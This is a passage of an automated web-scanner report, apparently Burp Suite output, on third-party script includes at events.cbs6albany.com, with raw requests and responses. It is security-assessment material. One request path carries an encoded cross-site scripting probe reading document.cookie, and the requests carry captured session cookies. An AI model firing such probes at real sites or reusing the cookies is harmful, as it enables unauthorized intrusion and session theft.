Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:52:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
Cache-Control: no-cache, private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:52:37 GMT; HttpOnly
Content-Length: 10226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
to find and post events, concerts, festivals, live music, and other things to do near you. Zvents is a free search engine where you can search for what to do by location, time, or event type." />

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.142. http://events.cbs6albany.com/%3F376e5%2522%253E%253Cscript%253Ealert(document.cookie previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/%3F376e5%2522%253E%253Cscript%253Ealert(document.cookie

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /%3F376e5%2522%253E%253Cscript%253Ealert(document.cookie HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 404 Not Found
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:52:51 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
Cache-Control: no-cache, private
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:52:51 GMT; HttpOnly
Content-Length: 11377

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
to find and post events, concerts, festivals, live music, and other things to do near you. Zvents is a free search engine where you can search for what to do by location, time, or event type." />

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.143. http://events.cbs6albany.com/albany-ny/events previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:28:06 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 41
ETag: "a237b25e0a55c754a542a1bd6c589c20"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:28:06 GMT; HttpOnly
Content-Length: 49439

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.144. http://events.cbs6albany.com/albany-ny/events/arts+crafts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/arts+crafts

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/arts+crafts HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:32:42 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 4013
ETag: "8312f3a00003c16e378c14aead74f993"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:32:42 GMT; HttpOnly
Content-Length: 23828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.145. http://events.cbs6albany.com/albany-ny/events/business+tech previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/business+tech

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/business+tech HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:25 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 122
ETag: "e64eb3779348fa22044f1248e60f06fc"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:25 GMT; HttpOnly
Content-Length: 18216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.146. http://events.cbs6albany.com/albany-ny/events/comedy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/comedy

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/comedy HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:34:41 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 859
ETag: "2394ab0f35b96be738c0e3f80b223242"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:34:41 GMT; HttpOnly
Content-Length: 33111

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

18.147. http://events.cbs6albany.com/albany-ny/events/community previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://events.cbs6albany.com
Path:	/albany-ny/events/community

Issue detail

The response dynamically includes the following scripts from other domains:

http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads
http://edge.quantserve.com/quant.js
http://js.zvents.com/javascripts/happy_default.js?65617
http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C

Request

GET /albany-ny/events/community HTTP/1.1
Host: events.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Sat, 29 Jan 2011 05:33:26 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
X-Rack-Cache: miss
X-HTTP_CLIENT_IP_O: 173.193.214.243
X-Runtime: 701
ETag: "5ec26f1ef331051cb41347e2c23296ae"
Cache-Control: must-revalidate, private, max-age=0
Set-Cookie: _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiCWNpdHkiC0FsYmFueSILcmFkaXVzaTciDWxhdGl0dWRlZho0Mi42NTE2OTk5OTk5OTk5OTgAZs8iCmVycm9yRiISZGlzdGFuY2VfdW5pdCIKbWlsZXMiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--f68fc4b04b289b12a68f39bf433cd00feb179c8f; path=/; expires=Fri, 29-Apr-2011 05:33:26 GMT; HttpOnly
Content-Length: 30428

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<meta property="fb:admins" content="620297159,100001046804596"/>

<script src="http://js.zvents.com/javascripts/happy_default.js?65617" type="text/javascript"></script>
...[SNIP]...

<script type="text/javascript" src="http://onset.freedom.com/fi/analytics/cms/?scode=wrgb&domain=events.cbs6albany.com&cname=zvents&ctype=section&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7C" + z_page_type + "&usetitle=true"></script>
...[SNIP]...

<script type="text/javascript" src="http://common.onset.freedom.com/common/tools/load.php?js=common_fi_oas,common_dartads"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
